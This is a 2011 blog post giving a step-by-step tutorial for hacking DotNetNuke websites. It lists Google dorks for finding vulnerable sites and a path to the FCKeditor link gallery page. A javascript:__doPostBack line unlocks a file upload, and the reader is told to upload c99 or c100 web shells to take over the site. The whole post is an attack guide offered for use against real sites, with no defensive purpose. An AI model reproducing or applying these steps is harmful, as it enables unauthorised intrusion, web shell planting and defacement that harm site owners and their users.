Friday, 30 September 2011

Do Not Durk Technique for Website hacking

           Portal Hacking (DNN) Technique:-


       One more hacking method called "Portal Hacking (DNN)". This method also uses in google search engine to find hackable sites.. Here U can use only Google Dorks for
hacking a websites..

Here U can use dez two Google Dorks
1- inurl:"/portals/0"

2- inurl:/tabid/36/language/en-US/Default.aspx

You can also modify this google dork according to your need & requirement

Here is the exploit
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Step 1 :
http://www.google.com

Step 2:
Now enter this dork
:inurl:/tabid/36/language/en-US/Default.aspx
this is a dork to find the Portal Vulnerable sites, use it wisely.


Step 3:
you will find many sites, Select the site which you are comfortable with.

Step 4:
For example take this site.
http://www.abc.com/Home/tabid/36/Lan...S/Default.aspx

Step 5: Now replace
/Home/tabid/36/Language/en-US/Default.aspx
with this
                                /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx


Step 6: You will get a Link Gallary page.So far so good!

Step 7: Dont do anything for now,wait for the next step...

Step 8: Now replace the URL in the address bar with a Simple Script
javascript:__doPostBack('ctlURL$cmdUpload','')


Step 9: You will Find the Upload Option



Step 10:
Select Root

Step 11:
Upload your package Your Shell c99,c100 , Images, etc

After running this JAVA script, you will see the option for Upload Selected File Now select you page file which you have  & upload here.
Now  Go to main page and refresh. you have seen hacked the website.


Done..!!

0 comments:

Post a Comment